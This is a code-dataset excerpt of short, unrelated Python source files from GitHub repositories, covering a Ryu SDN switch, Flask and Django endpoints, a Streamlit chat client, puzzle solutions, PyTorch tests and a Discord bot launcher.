parser.OFPFlowMod(datapath=datapath,\n command=ofproto.OFPFC_DELETE,\n out_port=ofproto.OFPP_ANY,\n out_group=ofproto.OFPG_ANY,\n\t\t\t\tinstructions=instructions,\n match=match)\n datapath.send_msg(mod)\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n if ev.msg.msg_len < ev.msg.total_len:\n self.logger.debug(\"packet truncated: only %s of %s bytes\",\n ev.msg.msg_len, ev.msg.total_len)\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n in_port = msg.match['in_port']\n\n pkt = packet.Packet(msg.data)\n eth = 
pkt.get_protocols(ethernet.ethernet)[0]\n\n if eth.ethertype == ether_types.ETH_TYPE_LLDP:\n # ignore lldp packet\n return\n dst = eth.dst\n src = eth.src\n\n dpid = datapath.id\n self.mac_to_port.setdefault(dpid, {})\n\n self.logger.info(\"packet in %s %s %s %s\", dpid, src, dst, in_port)\n\n # learn a mac address to avoid FLOOD next time.\n self.mac_to_port[dpid][src] = in_port\n\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n\n actions = [parser.OFPActionOutput(out_port)]\n # install a flow to avoid packet_in next time\n \n if out_port != ofproto.OFPP_FLOOD:\n match = parser.OFPMatch(in_port=in_port, eth_dst=dst)\n self.add_flow(datapath, 1, match, actions)\n # verify if we have a valid buffer_id, if yes avoid to send both\n # flow_mod & packet_out\n \n # Packet-out\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,\n in_port=in_port, actions=actions, data=data)\n datapath.send_msg(out)\n \n","repo_name":"HsiangTseng/workspaceryu","sub_path":"reopenh3.py","file_name":"reopenh3.py","file_ext":"py","file_size_in_byte":11368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"415386013","text":"from django.urls import path\n\nfrom . import views\n\n\nurlpatterns = [\n # ex: /polls/\n path('', views.index, name='index'),\n\n path('categories/', views.CategoryView.as_view(), name='categories'),\n path('BookingCategories/', views.CategoryDetailView.as_view(), name='category-detail')\n]\n","repo_name":"abidkhan03/django_Photographery","sub_path":"Photographery/Learn/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15530654657","text":"# Imports\r\nimport streamlit as st\r\nfrom streamlit_chat import message\r\nimport requests\r\n\r\nimport regex as re\r\n\r\nst.title(\"Chippy FastAPI\")\r\n\r\n# Streamlit input field\r\ninput_prompt = st.text_input(\"Enter a prompt\", \"What is a Large Language Model?\")\r\n\r\ndata = {\r\n \"input_prompt\": input_prompt,\r\n}\r\n\r\nplaceholder = st.empty() # placeholder for latest message\r\nmessage_history = []\r\nmessage_history.append(input_prompt)\r\n\r\nfor j, message_ in enumerate(message_history):\r\n if j % 2 == 0:\r\n message(message_, is_user=True) # display all the previous message\r\n\r\n#with placeholder.container():\r\n# message(message_history[-1]) # display the latest message\r\n\r\nres = requests.post(\"http://localhost:8000/predict/\", json=data)\r\ncleaned_answer = re.sub(\"User:.+\\n+Chip: \", \"\", res.json())\r\nmessage(cleaned_answer)\r\n\r\n## Generate output\r\n#if st.button(\"Chip it!\"):\r\n# res = requests.post(\"http://localhost:8000/predict/\", json=data)\r\n# st.markdown(res.json())","repo_name":"xaiguy/chippy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"2031594438","text":"\nimport json\n\n# import simplejson as json\n\nimport boto3\n\nfrom boto3.dynamodb.conditions import Key, Attr\n\n\n\ndynamodb = boto3.resource('dynamodb')\n\ntable = dynamodb.Table('basicinfo')\n\ndef lambda_handler(event, context):\n\n name = event['firstname']\n\n response = table.scan(\n FilterExpression = Attr('First name').eq(name)\n )\n 
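    # Also scan for items whose 'last name' attribute matches the same search value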
response1 = table.scan(\n FilterExpression = Attr('last name').eq(name)\n )\n\n if len(response['Items']) == 0:\n if len(response1['Items']) == 0:\n return {\n 'status': 0\n }\n else:\n \n return {\n 'status': 1,\n 'body': json.dumps(response1['Items'])\n }\n else:\n \n return {\n 'status': 1,\n 'body': json.dumps(response['Items'])\n }\n","repo_name":"aryanjain1/INE-Api","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5700060416","text":"def solution(s):\n answer = 987654321\n length = len(s)\n # 1개 이상 절반까지 갯수 표현가능 / 문자열의 두번째 부터 비교 시작한다.\n # 첫번째 값을 가지고 그다음부터 비교함\n for i in range(1, length//2+1):\n check = s[:i]\n tmp = ''\n cnt = 1\n # 인덱스 슬라이싱 개념으로 접근\n for j in range(i, length+i, i):\n if check == s[j:i+j]:\n cnt += 1\n else:\n # 같은 문자열 개수에 따라 정답될 수 있는 tmp 문자열붙인다.\n if cnt != 1:\n tmp += str(cnt) + check\n else:\n tmp += check\n # 현재와 다음 문자열이 다를 경우 초기화\n check = s[j:i+j]\n cnt = 1\n if answer > len(tmp):\n answer = len(tmp)\n # 길이가 1인 경우 (문자가 1개만 주어진 경우) 최소 1 임\n if answer == 987654321:\n answer = 1\n return answer","repo_name":"wnstj-yang/Algorithm","sub_path":"Programmers/programmers_문자열 압축.py","file_name":"programmers_문자열 압축.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72938743233","text":"\"\"\"usercntroller\"\"\"\r\nimport logging.config\r\nfrom http import HTTPStatus\r\n\r\nfrom flask import Blueprint, request, make_response\r\nfrom flask.json import jsonify\r\nfrom flask.views import MethodView\r\n\r\nfrom server.rest.controller.decorators import validate_request\r\nfrom server.rest.service.user import UserService\r\n\r\nUSER_BLUEPRINT = Blueprint('user', __name__)\r\n# Preparing log configuration\r\nlogging.config.fileConfig(fname='configuration/logging.config',\r\n disable_existing_loggers=True)\r\nlogger = logging.getLogger('pyweb')\r\n\r\n\r\nclass User(MethodView):\r\n \"\"\"User view\"\"\"\r\n\r\n @staticmethod\r\n def create_user():\r\n \"\"\"POST method to create user\"\"\"\r\n logger.info(\"User post method called...\")\r\n data = request.get_json(force=True)\r\n if 'username' not in data or data['username'] == '':\r\n return make_response(jsonify({\r\n 'status': 'NOT_ACCEPTABLE',\r\n 'message': 'Username must not be empty'\r\n })), HTTPStatus.NOT_ACCEPTABLE\r\n retval, message = UserService.create_user(data)\r\n if retval == 0:\r\n return make_response(jsonify({\r\n 'status': 'OK',\r\n 'message': message\r\n })), HTTPStatus.OK\r\n else:\r\n return make_response(jsonify({\r\n 'status': 'INTERNAL_SERVER_ERROR',\r\n 'message': message\r\n })), HTTPStatus.INTERNAL_SERVER_ERROR\r\n\r\n @staticmethod\r\n def get_user():\r\n \"\"\"GET method to get user\"\"\"\r\n retval, message = UserService.get_user()\r\n if retval == 0:\r\n return make_response(jsonify(message)), HTTPStatus.OK\r\n else:\r\n return make_response(jsonify({\r\n 'status': 'INTERNAL_SERVER_ERROR',\r\n 'message': message\r\n })), HTTPStatus.INTERNAL_SERVER_ERROR\r\n\r\n @staticmethod\r\n def update_user():\r\n \"\"\"PUT method to update user by name\"\"\"\r\n logger.info(\"User PUT method called...\")\r\n data = request.get_json(force=True)\r\n if 'username' not in data or data['username'] == '':\r\n return make_response(jsonify({\r\n 'status': 'NOT_ACCEPTABLE',\r\n 'message': 'Username must not be empty'\r\n })), 
HTTPStatus.NOT_ACCEPTABLE\r\n retval, message = UserService.update_user(data)\r\n if retval == 0:\r\n return make_response(jsonify({\r\n 'status': 'OK',\r\n 'message': message\r\n })), HTTPStatus.OK\r\n elif retval == 1:\r\n return make_response(jsonify({\r\n 'status': 'NOT_FOUND',\r\n 'message': message\r\n })), HTTPStatus.NOT_FOUND\r\n else:\r\n return make_response(jsonify({\r\n 'status': 'INTERNAL_SERVER_ERROR',\r\n 'message': message\r\n })), HTTPStatus.INTERNAL_SERVER_ERROR\r\n\r\n @staticmethod\r\n def delete_user():\r\n \"\"\"DELETE method to update user by name\"\"\"\r\n logger.info(\"User delete method called...\")\r\n data = request.get_json(force=True)\r\n if 'username' not in data or data['username'] == '':\r\n return make_response(jsonify({\r\n 'status': 'NOT_ACCEPTABLE',\r\n 'message': 'Username must not be empty'\r\n })), HTTPStatus.NOT_ACCEPTABLE\r\n retval, message = UserService.delete_user(data)\r\n if retval == 0:\r\n return make_response(jsonify({\r\n 'status': 'OK',\r\n 'message': message\r\n })), HTTPStatus.OK\r\n elif retval == 1:\r\n return make_response(jsonify({\r\n 'status': 'NOT_FOUND',\r\n 'message': message\r\n })), HTTPStatus.NOT_FOUND\r\n else:\r\n return make_response(jsonify({\r\n 'status': 'INTERNAL_SERVER_ERROR',\r\n 'message': message\r\n })), HTTPStatus.INTERNAL_SERVER_ERROR\r\n\r\n\r\n@USER_BLUEPRINT.route(\"/api/user\", methods=['POST'])\r\n@validate_request\r\ndef createuser():\r\n \"\"\"create user end point\"\"\"\r\n return User.create_user()\r\n\r\n\r\n@USER_BLUEPRINT.route(\"/api/user\", methods=['GET'])\r\ndef getuser():\r\n \"\"\"get user end point\"\"\"\r\n return User.get_user()\r\n\r\n\r\n@USER_BLUEPRINT.route(\"/api/user\", methods=['PUT'])\r\n@validate_request\r\ndef updateuser():\r\n \"\"\"update user end point\"\"\"\r\n return User.update_user()\r\n\r\n\r\n@USER_BLUEPRINT.route(\"/api/user\", methods=['DELETE'])\r\n@validate_request\r\ndef deleteuser():\r\n \"\"\"delete user end point\"\"\"\r\n return User.delete_user()\r\n","repo_name":"Laxminarsaiah/python_flask_RESTful","sub_path":"server/rest/controller/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11225086518","text":"from model.product import Product\nfrom db.product_db import ProductDB\n\nclass ProductController:\n\n def __init__(self):\n self.__product_db = ProductDB()\n\n def create_product(self, id, name, price):\n product = Product(id, name, price)\n product = product.serialize()\n self.__product_db.insert(product)\n\n return product\n\n def update_product(self, product_id, name, price):\n data = self.__product_db.get()\n list_index = 0\n\n for index, item in enumerate(data):\n if item['id'] == product_id:\n list_index = index\n\n product = Product(product_id, name, price)\n product = product.serialize()\n\n self.__product_db.update(list_index, product)\n return product\n\n def read_product(self, product_id):\n data = self.__product_db.get()\n for item in data:\n if item['id'] == product_id:\n return item\n\n def delete_product(self, product_id):\n data = self.__product_db.get()\n list_index = 0\n\n for index, item in enumerate(data):\n if item['id'] == product_id:\n list_index = index\n\n self.__product_db.delete(list_index)\n return 
product_id\n\n","repo_name":"matheusreis0/crud-products","sub_path":"controller/product_controller.py","file_name":"product_controller.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5136860629","text":"from tkinter import *\r\njanela = Tk()\r\njanela.title(\"Programa 1\")\r\ntexto = Label(janela, text='Primeira Interface Gráfica')\r\ntexto.grid(column=0, row=0, padx=30, pady=30)\r\n\r\nbotao = Button(janela, text='Olá Mundo')\r\nbotao.grid(column=0, row=1, padx=10, pady=10)\r\n\r\ntexto_resposta = Label(janela, text='')\r\ntexto_resposta.grid(column=0, row=2, padx=10, pady=10)\r\n\r\n\r\n\r\n\r\njanela.mainloop()","repo_name":"M4theus1/Primeira-Interface-Grafica","sub_path":"estudo.py","file_name":"estudo.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6067363775","text":"import copy\n\nwith open(\"C:\\\\Users\\\\nicoh\\\\advent_of_code_2022\\\\day_13\\\\input.txt\") as f: \n lines = f.readlines()\n\ndef compare(left, right):\n\n if not (isinstance(left, list) or isinstance(right, list)):\n if left == right:\n return \"equals\"\n elif left < right:\n return \"left\"\n else:\n return \"right\"\n elif isinstance(left, list) and isinstance(right, list):\n result = \"equals\"\n while result == \"equals\":\n if len(left) == 0 and len(right) > 0:\n return \"left\"\n elif len(right) == 0 and len(left) > 0:\n return \"right\"\n elif len(left) == 0 and len(right) == 0:\n return \"equals\"\n result = compare(left.pop(0), right.pop(0))\n return result\n else:\n if not isinstance(left, list):\n left = [left]\n else:\n right = [right]\n return compare(left, right)\n\npackets = []\nfor line in lines:\n line = line.rstrip()\n if line == '':\n pass\n else:\n packets.append(eval(line))\npackets.append([[2]])\npackets.append([[6]])\n\n# bubble sort!\nfor i in range(len(packets) - 1):\n for j in range(len(packets) - 1):\n result = compare(copy.deepcopy(packets[j]), copy.deepcopy(packets[j+1]))\n if result == \"right\":\n # we need to swap\n temp = packets[j]\n packets[j] = packets[j+1]\n packets[j+1] = temp\n\nfor i in range(len(packets)):\n if packets[i] == [[2]]:\n idx_2 = i + 1\n elif packets[i] == [[6]]:\n idx_6 = i + 1\nprint(idx_2 * idx_6)","repo_name":"nicohiggs/advent_of_code_2022","sub_path":"day_13/problem_2.py","file_name":"problem_2.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18074100827","text":"#문제1.\n# 다음 세 개의 리스트가 있을 때,\n# subs = ['I', 'You']\n# verbs = ['Play', 'Love']\n# objs = ['Hockey', 'Football']\n#\n# 3형식 문장을 모두 출력해 보세요. 
반드시 comprehension을 사용합니다.\n\nsubs = ['I', 'You']\nverbs = ['Play', 'Love']\nobjs = ['Hockey', 'Football']\n\nresult=[(a,b,c) for a in subs for b in verbs for c in objs]\nresult.append(('I',\"Love\",'You'))\nfor i in result :\n print(i[0],' ',i[1],' ',i[2])","repo_name":"asd1025/practice03","sub_path":"problem01.py","file_name":"problem01.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1385948704","text":"\"\"\"\nThis file contains the functions responsible for creating the\ntraining and testing datasets in the folder.\n\nThis file also contains a function that visualizes all grasp\ncandidates of an image.\n\"\"\"\n\nimport glob\nimport os\nimport shutil\nimport cv2\nimport random\nimport numpy as np\n\nfrom data_loader import DataLoader\nfrom parameters import Params\nfrom grasp_utils import grasps_to_bboxes\n\nparams = Params()\n\n# Statistics of each class of data\n\"\"\"{'Clothes_hanger': 5, 'walkman': 11, 'fish': 15, 'usb_drive': 24,\n 'violin': 28, 'toy_car': 31, 'insect': 35, 'fork': 37, 'bed': 42,\n 'Photo_Frame': 44, 'table': 59, 'laptop': 64, 'can': 65, 'cup': 68,\n 'cell_phone': 72, 'sword': 79, 'knife': 84, 'sofa': 86, 'vase': 107,\n 'stool': 114, 'computer_monitor': 142, 'gun': 143, 'toy_plane': 155,\n 'guitar': 175, 'bottle': 178, 'pen+pencil': 190, 'plants': 204,\n 'figurines': 219, 'Lamp': 267, 'Chair': 389}\"\"\"\n\nDATA_PATH = 'data'\n\ntop_5 = ['Chair', 'Lamp', 'figurines', 'plants', 'pen+pencil'] # cls instances -- 190\ntop_10 = ['gun', 'computer_monitor', 'toy_plane', 'guitar',\n 'bottle', 'pen+pencil', 'plants', 'figurines', 'Lamp', 'Chair'] # cls instances -- 143\n\ndef create_test(top_n_list, top_n_str, n_test_per_class):\n for cls in top_n_list:\n move_count = 0\n for img_path in glob.iglob('%s/%s/train/%s/*/*' % (DATA_PATH, top_n_str, cls)):\n if not img_path.endswith('RGB.png'):\n continue\n if move_count >= n_test_per_class:\n continue\n\n move_count += 1\n # E.g. '__.png'\n img_name = img_path.split('\\\\')[-1]\n img_var = img_name.split('_')[0]\n img_id = img_name.split('_')[1]\n\n if cls not in os.listdir(os.path.join(DATA_PATH, top_n_str, 'test')):\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'test', cls))\n if img_id not in os.listdir(os.path.join(DATA_PATH, top_n_str, 'test', cls)):\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'test', cls, img_id))\n\n for file in glob.glob('%s/%s/train/%s/%s/%s_%s*' % (DATA_PATH, top_n_str, cls, img_id, img_var, img_id)):\n name = file.split('\\\\')[-1]\n shutil.move(file, '%s/%s/test/%s/%s/%s' % (DATA_PATH, top_n_str, cls, img_id, name))\n\ndef create_top_n(top_n_list, top_n_str, n_img_per_class):\n if top_n_str not in os.listdir(DATA_PATH):\n os.mkdir(os.path.join(DATA_PATH, top_n_str))\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'train'))\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'test'))\n \n for cls in top_n_list:\n n_img = 0\n if cls not in os.listdir(os.path.join(DATA_PATH, top_n_str, 'train')):\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'train', cls))\n if cls not in os.listdir(os.path.join(DATA_PATH, top_n_str, 'test')):\n os.mkdir(os.path.join(DATA_PATH, top_n_str, 'test', cls))\n img_list = []\n for img_path in glob.iglob('%s/*/%s/*/*' % (DATA_PATH, cls)):\n img_cls = img_path.split('\\\\')[-3]\n # E.g. 
'<var>_<id>_<type>.png'\n            img_name = img_path.split('\\\\')[-1]\n            img_var = img_name.split('_')[0]\n            img_id = img_name.split('_')[1]\n\n            if img_var + '_' + img_id not in img_list:\n                img_list.append(img_var + '_' + img_id)\n                n_img += 1\n            if n_img >= n_img_per_class:\n                continue\n\n            if img_id not in os.listdir(os.path.join(DATA_PATH, top_n_str, 'train', cls)):\n                os.mkdir(os.path.join(DATA_PATH, top_n_str, 'train', cls, img_id))\n            \n            shutil.copyfile(img_path, os.path.join(DATA_PATH, top_n_str, 'train', cls, img_id, img_name))\n\n\ndef count():\n    cls_list = []\n    with open(os.path.join('data', 'cls.txt'), 'r') as f:\n        file = f.readlines()\n        for cls in file:\n            # remove '\\n' from string\n            cls = cls[:-1]\n            cls_list.append(cls)\n\n    img_id_dict = {}\n    for img_path in glob.iglob('%s/*/*/*/*' % 'data'):\n        if not img_path.endswith('RGB.png'):\n            continue\n        \n        img_cls = img_path.split('\\\\')[-3]\n        # E.g. '<var>_<id>_<type>.png'\n        img_name = img_path.split('\\\\')[-1]\n        img_var = img_name.split('_')[0]\n        img_id = img_name.split('_')[1]\n        img_id_with_var = img_var + '_' + img_id\n        img_id_dict[img_id_with_var] = img_cls\n\n    cls = list(img_id_dict.values())\n    cls_dict = {}\n    for i in range(30):\n        cls_dict[cls_list[i]] = cls.count(cls_list[i])\n\n    ordered_cls_dict = {k: v for k, v in sorted(cls_dict.items(), key=lambda item: item[1])}\n    print(ordered_cls_dict)\n\n\ndef create_cls_txt(cls_list, file_path):\n    with open(file_path, 'w') as f:\n        for cls in cls_list:\n            f.write(cls)\n            f.write('\\n')\n        f.close()\n\n\ndef find_grasp_file():\n    \"\"\"\n    Missing grasp files:\n    Chair 1_4f4ce917619e3d8e3227163156e32e3c_grasps.txt\n    Chair 3_4f4ce917619e3d8e3227163156e32e3c_grasps.txt\n    Chair 0_5d60590d192c52553a23b8cb1a985a11_grasps.txt\n    Chair 1_5d60590d192c52553a23b8cb1a985a11_grasps.txt\n    Chair 2_5d60590d192c52553a23b8cb1a985a11_grasps.txt\n    Chair 3_5d60590d192c52553a23b8cb1a985a11_grasps.txt\n    Chair 4_5d60590d192c52553a23b8cb1a985a11_grasps.txt\n    deleted from top_5/train alr\n    \"\"\"\n    ls = glob.glob('%s/*/*/*.txt' % 'data/item-grasp')\n    file_ls = [path.split('\\\\')[-1] for path in ls]\n    print(len(file_ls))\n    input()\n    total = 0\n    no_match = 0\n    for img_path in glob.iglob('%s/*/*/*/*' % 'data/top_5'):\n        if not img_path.endswith('RGB.png'):\n            continue\n        \n        img_cls = img_path.split('\\\\')[-3]\n        # E.g. 
'<var>_<id>_grasps.txt'\n        img_name = img_path.split('\\\\')[-1]\n        img_var = img_name.split('_')[0]\n        img_id = img_name.split('_')[1]\n        img_grasp_name = img_var + '_' + img_id + '_grasps.txt'\n\n        total += 1\n        if img_grasp_name not in file_ls:\n            print(img_cls, img_grasp_name)\n            no_match += 1\n\n    return no_match, total\n\n\ndef get_grasp_files():\n    train_ls = glob.glob('%s/*/*/*RGB.png' % 'data/top_5/train')\n    train_file_ls = [path.split('\\\\')[-1] for path in train_ls]\n    test_ls = glob.glob('%s/*/*/*RGB.png' % 'data/top_5/test')\n    test_file_ls = [path.split('\\\\')[-1] for path in test_ls]\n    for img_path in glob.iglob('%s/*/*/*.txt' % 'data/item-grasp'):\n        img_cls = img_path.split('\\\\')[-3]\n        # E.g. '<var>_<id>_grasps.txt'\n        img_name = img_path.split('\\\\')[-1]\n        img_var = img_name.split('_')[0]\n        img_id = img_name.split('_')[1]\n        img_rgb_name = img_var + '_' + img_id + '_RGB.png'\n\n        if img_rgb_name in test_file_ls:\n            shutil.copyfile(img_path, 'data/top_5/test/%s/%s/%s' % (img_cls, img_id, img_name))\n        elif img_rgb_name in train_file_ls:\n            shutil.copyfile(img_path, 'data/top_5/train/%s/%s/%s' % (img_cls, img_id, img_name))\n        else:\n            print(img_cls, img_name)\n\n\ndef test_data_loader():\n    \"\"\"Identical dataloader process as written in data_loader.py.\"\"\"\n    data_loader = DataLoader(params.TRAIN_PATH, 2, params.TRAIN_VAL_SPLIT)\n    for img, label, candidates in data_loader.load_grasp():\n        target_bbox = grasps_to_bboxes(label)\n        target_bboxes = grasps_to_bboxes(candidates)\n\n        img_vis = np.array(img.cpu())\n        img_r = np.clip((img_vis[:, 0, :, :] * 0.229 + 0.485) * 255, 0, 255)\n        img_g = np.clip((img_vis[:, 1, :, :] * 0.224 + 0.456) * 255, 0, 255)\n        img_d = img_vis[:, 2, :, :][0]\n        \n        img_bgr = np.concatenate((img_g, img_g, img_r), axis=0)\n        img_bgr = np.moveaxis(img_bgr, 0, -1)\n        img_bgr = np.ascontiguousarray(img_bgr, dtype=np.uint8)\n        \n        draw_bbox(img_bgr, target_bbox[0], (255, 0, 0))\n        for bbox in target_bboxes:\n            # Choose some random bboxes to show:\n            if random.randint(0, 5) == 0:\n                draw_bbox(img_bgr, bbox, (0, 255, 0))\n\n        cv2.imshow('img', img_bgr)\n        cv2.waitKey(0)\n\n\ndef draw_bbox(img, bbox, color):\n    x1 = int(bbox[0] / 1024 * params.OUTPUT_SIZE)\n    y1 = int(bbox[1] / 1024 * params.OUTPUT_SIZE)\n    x2 = int(bbox[2] / 1024 * params.OUTPUT_SIZE)\n    y2 = int(bbox[3] / 1024 * params.OUTPUT_SIZE)\n    x3 = int(bbox[4] / 1024 * params.OUTPUT_SIZE)\n    y3 = int(bbox[5] / 1024 * params.OUTPUT_SIZE)\n    x4 = int(bbox[6] / 1024 * params.OUTPUT_SIZE)\n    y4 = int(bbox[7] / 1024 * params.OUTPUT_SIZE)\n    cv2.line(img, (x1, y1), (x2, y2), color, 1)\n    cv2.line(img, (x2, y2), (x3, y3), (0, 0, 255), 1)\n    cv2.line(img, (x3, y3), (x4, y4), color, 1)\n    cv2.line(img, (x4, y4), (x1, y1), (0, 0, 255), 1)\n\n\nif __name__ == '__main__':\n    # Get dataset statistics\n    #count()\n    # Separate and create train/test dataset folders for CLS training\n    #create_cls_txt(top_10, '%s/cls_top_10.txt' % DATA_PATH)\n    #create_top_n(top_10, 'top_10', 143)\n    #create_test(top_10, 'top_10', 15)\n    # Add grasping .txt files to the train/test dataset folders\n    #no_match, total = find_grasp_file()\n    #print(no_match, total)\n    #get_grasp_files()\n    # Visualize Grasp training data to make sure it all makes sens\n    test_data_loader()","repo_name":"stevolopolis/GrTrainer","sub_path":"scratch.py","file_name":"scratch.py","file_ext":"py","file_size_in_byte":9359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23371937531","text":"import sys\r\nimport logging\r\n\r\ndef saving_the_universe(engines, queries, level=0):\r\n    visited = set()\r\n    count = 0\r\n    for q in queries:\r\n        if q not in visited:\r\n            visited.add(q)\r\n        else:\r\n            log.debug('')\r\n        \r\n        if len(visited) == len(engines):\r\n            visited.clear()\r\n            visited.add(q)\r\n            count += 1\r\n    return count\r\n\r\n\r\n# log initialization\r\nlogging.basicConfig()\r\nlog = logging.getLogger(__name__)\r\n#log.setLevel(logging.DEBUG)\r\nlog.setLevel(logging.INFO)\r\n\r\n# open files\r\ninput = open(sys.argv[1], 'r')\r\noutput = open('saving_the_universe.out', 'w')\r\n\r\n# read input\r\nlines = input.readlines()\r\n\r\n# N - number of cases\r\nN = int(lines[0])\r\ndel lines[0]\r\n\r\nfor case in range(N):\r\n    engines = []\r\n    queries = []\r\n\r\n    #S - 
the number of search engines\r\n S = int(lines[0])\r\n del lines[0]\r\n\r\n for engine in range(S):\r\n engines.append(lines[0].strip())\r\n del lines[0]\r\n\r\n #Q - the number of incoming queries\r\n Q = int(lines[0])\r\n del lines[0]\r\n\r\n for query in range(Q):\r\n queries.append(lines[0].strip())\r\n del lines[0]\r\n\r\n log.info('Case #' + str(case+1) + ': ' + str(saving_the_universe(engines, queries)) + '\\n')\r\n output.write('Case #' + str(case+1) + ': ' + str(saving_the_universe(engines, queries)) + '\\n')\r\n\r\ninput.close()\r\noutput.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_1/350.py","file_name":"350.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32313656242","text":"import torch\nfrom unittest import TestCase\n\nfrom src.modules.masked_linear import MaskedLinear, add_masks_to_module\n\n\nINPUTS = (torch.arange(0, 10).unsqueeze(0).unsqueeze(0).float() + 1) / 10.0\n\n\nclass _MockModel(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.linear1 = torch.nn.Linear(10, 10)\n self.linear2 = torch.nn.Linear(3, 3)\n self.other = torch.nn.BatchNorm1d(10)\n\n\nclass MaskedLinearTest(TestCase):\n\n \"\"\"Test cases for pruning unsaturated activations.\n \n Most of these test cases utilize the RnnNorm, i.e. assume close to zero == unsaturated.\n \"\"\"\n\n def test_masked_linear(self):\n torch.random.manual_seed(1066)\n inputs = torch.randn(10)\n linear = torch.nn.Linear(10, 10)\n masked_linear = MaskedLinear.convert(linear)\n\n torch.testing.assert_allclose(masked_linear(inputs), linear(inputs))\n masked_linear.mask.data.fill_(0.)\n torch.testing.assert_allclose(masked_linear(inputs), linear.bias)\n\n def test_add_masks_to_model_sequential(self):\n torch.random.manual_seed(37)\n model = torch.nn.Sequential(\n torch.nn.Linear(10, 10),\n torch.nn.ReLU(),\n torch.nn.Linear(10, 10),\n torch.nn.Softmax(dim=-1),\n )\n add_masks_to_module(model)\n\n modules = list(model.children())\n assert isinstance(modules[0], MaskedLinear)\n assert isinstance(modules[1], torch.nn.ReLU)\n assert isinstance(modules[2], MaskedLinear)\n assert isinstance(modules[3], torch.nn.Softmax)\n \n def test_add_masks_to_model_update_attr_refs(self):\n model = _MockModel()\n add_masks_to_module(model)\n self.assertIsInstance(model.linear1, MaskedLinear)\n self.assertIsInstance(model.linear2, MaskedLinear)\n self.assertIsInstance(model.other, torch.nn.BatchNorm1d)\n","repo_name":"viking-sudo-rm/saturated-sgd","sub_path":"src/tests/modules/test_masked_linear.py","file_name":"test_masked_linear.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72196975875","text":"from pip._vendor import requests\n\nfrom functions.functions import CircleAreaFunction\n\n\ndef get_random_circle_area():\n url = 'https://www.random.org/integers/'\n params = {\n 'num': 1,\n 'min': 1,\n 'max': 10,\n 'col': 1,\n 'base': 10,\n 'format': 'plain',\n 'rnd': 'new',\n }\n try:\n response = requests.get(url=url, params=params)\n except ConnectionError:\n return 'Error', 'Error'\n\n radius = int(response.content)\n circle_function = CircleAreaFunction(radius)\n circle_function.solve()\n answer = circle_function.answer[0]\n return radius, 
answer\n","repo_name":"Ingwar121/workshop","sub_path":"functions/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11975155287","text":"import os\n\nfrom client import MyClient\n\nif __name__ == '__main__':\n bot = 'staria'\n print('start', bot)\n # this is a application token\n token = os.environ.get(bot)\n\n # pass unique str\n client = MyClient(bot)\n client.post_works.start(19, 30)\n client.post_sleep.start(21, 30)\n print('end', bot)\n client.run(token)","repo_name":"s0ngkran/discord-bot","sub_path":"c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23943194004","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jun 9 10:11:38 2022\r\n\r\n@author: Rephayah\r\n\"\"\"\r\nimport numpy as np\r\n\r\nv=1\r\ngridcols = 8\r\ngridrows = 7\r\nn = gridcols\r\nb = gridrows\r\n\r\ncoords = []\r\nfor i in range(1,b+1):\r\n for j in range(1, n+1):\r\n coords.append([i,j])\r\n \r\nprint(coords)\r\ncoords = [str(x) for x in coords]\r\nc = []\r\nfor p in range(len(coords)):\r\n q= coords[p].split(\"[\") #Remove closing parenthese\r\n c.append(q)\r\nf = []\r\nfor a in range(len(c)):\r\n g = c[a][1]\r\n f.append(g)\r\n 